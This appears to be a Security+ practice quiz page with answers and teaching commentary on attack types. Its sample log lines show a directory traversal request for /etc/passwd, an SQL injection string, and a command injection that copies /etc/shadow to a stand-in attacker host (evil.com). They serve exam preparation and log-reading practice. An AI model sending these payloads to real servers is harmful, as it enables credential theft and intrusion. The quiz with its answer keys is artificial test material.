Pen used to do a practice exam.

Domain 1 Quiz

Domain 1 Quiz

  1. Assign the attack names at right to the descriptions at left. You use each attack name once. Something like "Number 5 matches e", for numbers 1 through 4. On the real exam, this will take the form of pull-down menus by each description.
    1. Walking down the street, you get advertising messages from stores you are walking past
    2. You hear from friends that contact information they shared only with you seems to be loose on the Internet
    3. You receive text messages containing random advertisements
    4. You receive recorded phone calls that you believe are in Mandarin, a language you don't speak
    1. SPIM
    2. Bluesnarfing
    3. Vishing
    4. Bluejacking
    1=d, 2=b, 3=a, 4=c

    Bluejacking = illicit and unwanted connections, "Bluetooth hijacking", pushing out advertising from the nearby store. I don't know if this is a threat in the real world, but it is in the question pool.

    Bluesnarfing = an illicit Bluetooth connection stole your address book.

    SPIM = Spam over Instant Messaging.

    Vishing = like phishing (non-targeted) but over voice, from spoofed caller numbers. I live in West Lafayette, just down the street from Purdue University, with a large number of foreign students. I get frequent calls from a spoofed Chicago number with a recorded Chinese message with background music. I've been told they're borderline scams from immigration law firms.
  2. Liz is a security analyst for the IT department of a large university with a correspondingly large number of users. She has been investigating a sophisticated privilege escalation attack. She has determined that the attacker used an ordinary user account with a rather large user ID number. The attack changed that to a very low user ID number, associated with a highly privileged system account. Which of these did the attack utilize?
    1. Improper account configuration
    2. Memory leak
    3. Buffer overflow
    4. Integer overflow
    5. Race condition
    The idea is that the UID was so large that it rolled over MAX_INT (or the maximum integer representable in the programming language on that architecture). The Y2K problem was this in two base-ten digits. With unsigned integers on 32-bit hardware, not paying attention to this problem:
    232 - 1 = 4,294,967,295
    but:
    4,294,967,295 + 1 = 0
    Don't know too much! That makes it hard. CompTIA is probably posing their question in a 16-bit world, if not an 8-bit one.
  3. You are equipping a forensics team. Which of these would be most useful?
    1. A set of precision screwdrivers
    2. A cheap camera
    3. Luminol
    4. Latex gloves and masks
    The last two are for biomedical work, CompTIA will trap people who like a certain type of TV show. The first might be useful, eventually. But a camera is always useful. "Cheap" makes it less attractive, they often make the correct answer seems worse.
  4. You observe the following. 
    66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /../../../etc/passwd HTTP/1.1" 200 25310 "https://www.bing.com/" - -
174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
    What type of attack has happened?
    1. SQL Injection
    2. Directory Traversal
    3. Buffer Overflow
    4. Command Injection
    They tried to send the web server up out of the web content area and down into the /etc configuration area on a UNIX-family operating system.
  5. You observe the following. 
    66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /cgi-bin/?cmd=scp%20/etc/shadow%20hacker@evil.com HTTP/1.1" 200 25310 "https://www.bing.com/" - -
174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
    What type of attack has happened?
    1. SQL Injection
    2. Directory Traversal
    3. Buffer Overflow
    4. Command Injection
    Know that %20 is the ASCII code for a space. Notice the string:
    scp%20/etc/shadow%20hacker@evil.com
    which decodes to:
    scp /etc/shadow hacker@evil.com
    That's the syntax to use scp to make an SSH connection as user hacker at host evil.com, and copy the file /etc/shadow (which contains the web server's user password hashes!) to that user's home directory on that remote server.
  6. You observe the following. 
    66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /database/'%20OR%201=1%20;-- HTTP/1.1" 200 25310 "https://www.bing.com/" - -
174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
    What type of attack has happened?
    1. SQL Injection
    2. Directory Traversal
    3. Buffer Overflow
    4. Command Injection
    They are asking for: ' OR 1=1; --'
    An alternative version of this question is a description, "You notice strange punctuation marks in the log."
  7. You are examining web server logs, and you notice some unusually long requests. What type of attack has happened?
    1. SQL Injection
    2. Directory Traversal
    3. Buffer Overflow
    4. Command Injection
    They hoped to send too much data to a privileged service that did not check input length to make sure it had enough memory to store the input.
  8. You observe the following in the results of a security scan. What is this?
    Channel SSID
    1 corpnet3
    6 corpnet3
    6 netgear
    11 corpnet3
    1. Evil twin
    2. Rogue AP
    3. Bluesmacking
    4. Watering hole
    The third one in the list has a default SSID, the name of a major manufacturer. It may have many security problems caused by other default settings.
  9. Last week Ann, a staff member in the Human Resources department, did a Google search and clicked on one of the links on the first page of results. That took her to a strange page. She went back, realized she had misspelled her search, corrected that, and found what she needed. Today she logged on to her bank site from work and noticed some mysterious transfers from her account to a bank in Eastern Europe. What has happened?
    1. Clickjacking
    2. Ransomware
    3. Crimeware
    4. Extortionware
    5. Spyware
    The tipoff is transfers out of her bank account, which CompTIA associates with "crimeware". Clickjacking could have to do with how it happened, but the question asks you to name the event. Ransomware would be the answer if she was told to pay to recover her data from deletion or encryption, extortionware if she was told to pay to avoid the exposure of embarrassing information (which might be untrue), spyware would have to do with sensitive information being stolen. If you say "Yes, but if there was spyware that could lead to stealing her banking credentials, and that could lead to the transfers", you are building a more complicated answer.
  10. You observe the following in the results of a security scan. What is this?
    Channel SSID
    1 corpnet3
    6 corpnet3
    6 corpnet3
    11 corpnet3
    1. Evil twin
    2. Rogue AP
    3. Bluesmacking
    4. Watering hole
    In the CompTIA universe, no organization is large enough to need more than three WAPs. Nor does it have a large enough facility to have two WAPs on the same channel at either end of the building. And, apparently, all WLANs are 802.11b/g/n/ax in North America, so there are 11 channels. So, either the 2nd or 3rd in the list is a fake set up to attract connections.

    In case Bob hasn't remembered to tell you this part yet...

    The three useful channels (in the CompTIA universe) are 1, 6, and 11. If you get a "configure this network" diagram involving wireless, carefully look all around it to see what fixed wireless is already there.

    If you are configuring the only WAP, use channel 6 as it's the middle of the band and the antenna(s), always a compromise, will work best there.

    If you are configuring an additional WAP, and there's already just one on either channel 1 or 11, pick the opposite end.

    If there are two others, pick whichever of 1, 6, and 11 aren't yet in use.
  11. Shonda, a security auditor at a financial institution, discovered an advanced attack that had stolen and exfiltrated a great deal of sensitive information. She searched a database for details of the attack, but found nothing. After a great deal of investigation and research, she discovered that it seems to be a new vulnerability with no available patch, and she implemented a workaround. What did she discover?
    1. False-positive event
    2. False-negative event
    3. Zero-day event
    4. IDS failure event
    5. IPS failure event
    "In a database" is CompTIA's allusion to Mitre's CVE list.
  12. Shari, a network engineer at a major health care facility, has determined that when the head of the Radiology department authenticated to the medical image database server, the encrypted traffic was captured by an intruder. That intruder later transmitted that information again to access the database as the highly privileged account. What type of attack is this?
    1. APT
    2. Rootkit
    3. Rogue AP
    4. Replay
    Lots of clutter and distraction around a simple story: Someone authenticated, the attacker recorded and retransmitted (replayed) it to get in. On the actual CompTIA exam they might include the head of Radiology's name, what category of images she was looking at, and so on.
  13. Desmond, a network engineer, has been directed to set up network security that will require a device to authenticate itself onto the network and verify that patching and anti-virus signatures are updated, before allowing the user to try to authentication. What should Desmond use?
    1. 802.1i
    2. 802.1x
    3. 802.1q
    4. 802.11i
    A.k.a. Network Access Control or NAC, or Port Security.
  14. Mehmet, the database administrator, has discovered that a user has accidentally deleted an entire database table. What went wrong?
    1. Misconfigured account
    2. Untrained user
    3. Inadequate input validation
    4. Memory leak
    The user shouldn't have been able to destroy the database table.
  15. News reports tell of a major DDoS against a famous company. Meanwhile, you receive a letter from your ISP saying that your home computer is sending malicious Linux-sourced traffic. But you don't own a Linux computer, in fact you don't own any computer. Your home electronics are limited to a smart TV with a Blu-ray player and a DVR. What has happened?
    1. Nothing, your ISP is wrong
    2. RAT
    3. BOT
    4. Trojan
    Smart TVs, Blu-ray players, and DVRs all run Linux, although their owners rarely known this. They're based on rather old versions, usually with a 2.2.26 kernel from 2004, often with well-known default passwords, and with no way to patch or reconfigure it. It has become a 'bot or zombie in a DDoS attack. Yes, the perpetrator is controlling it, but not doing any RAT-like abuse (collecting data from your house, interacting with you), and they didn't have to tempt you with a Trojan to get in. My guess would be that your router has PnP or Plug-and-Play turned on, and they connected in — the Mirai botnet did exactly this, with huge numbers of IoT devices running Telnet service with a known default password. Yes, the premise of this question seems strange, you get a letter at home, but questions very much like this are in the pool. I got two or three questions set at home, one very similar to this.
  16. Jim is a software developer. Tina, his manager, has asked him to list software design and development security issues to share with new team members. Which of these is the reason for most software vulnerabilities?
    1. Improper input handling
    2. Inadequate error handling
    3. Support beyond end-of-life
    4. Default configurations
    User input may be hostile. It must be validated and either rejected or corrected if of inappropriate size, format, syntax, semantics, etc.
  17. Inga, a security analyst at a government agency, is inspecting the components of her operating system. She had identified what looks like a compatibility driver, but she suspects that it is being used by malware to monitor keystrokes and steal other data. If so, what malware technique has she discovered?
    1. Driver masquerading
    2. Shimming
    3. Driver refactoring
    4. Data flow manipulating
    Driver shimming can be legitimately used to make an older 32-bit driver compatible with a 64-bit operating system. However, malicious software can masquerade as a legitimate shim.

    This is an example of CompTIA's focus on memorizing sometimes arbitrary terminology. In the real world there may be other, equally valid, terms. But to get the point on the exam, you have to pick CompTIA's preferred terminology.
  18. Alexandra is a White Hat penetration tester doing a Black Box attack. She is using software to automatically submit queries to the search form on a web page. What is she doing?
    1. Active reconnaissance
    2. Passive reconnaissance
    3. Open-source analysis
    4. Pivoting
    It is active, not passive, because her software is sending inputs and interacting with the web server. It isn't open-source because Black Box implies the opposite. Pivoting means breaking into one system, using it as a foothold to attack other systems inside.
  19. Jermain has been trying to print a document on a nearby printer. It is operational, from time to time it produces a print job and someone from several offices down the hall arrives to collect their output. What is probably responsible? Select two
    1. Bluesnarfing
    2. Bluesmacking
    3. Bluejacking
    4. Jamming
    5. Bluesniffing
    "Bluesmacking" is a made-up alternative term for jamming Bluetooth radio signals. Jermain is sitting close enough to normally be in range of Bluetooth. People down the hall must be using different technology to send their print jobs.
  20. Vladimir has written some malicious software that adds unneeded loops, NOPs, and other ineffectual code every time it is executed or spread to a new platform. What technique is he using?
    1. Refactoring
    2. Shimming
    3. Masquerading
    4. Modifying
    It literally modifies the code, but "refactoring" is what you must select to get the point. The changes make automated detection much more difficult.
  21. Peter is a security analyst at a bank. The bank wants to extend its use of an outdated operating system, as the alternative would require replacing all their existing automated teller machines built into storefronts and standalone brick kiosks. What problem will they have to solve?
    1. Embedded systems
    2. EOL
    3. IoT
    4. Input validation
    5. Error handling
    End of Life. Many deployed ATMs still run Windows XP. Embedded and IoT become more tempting with the emphasis on the ATMs being built into enclosures. Proper and complete input validation and error handling are, of course, very important, but the question is about things they haven't yet done.

Exhibit with 4 items plus 20 questions

Passing = 82% of 24 = 19.7

Goal = 91% of 24 = 21.8

To the Cybersecurity Page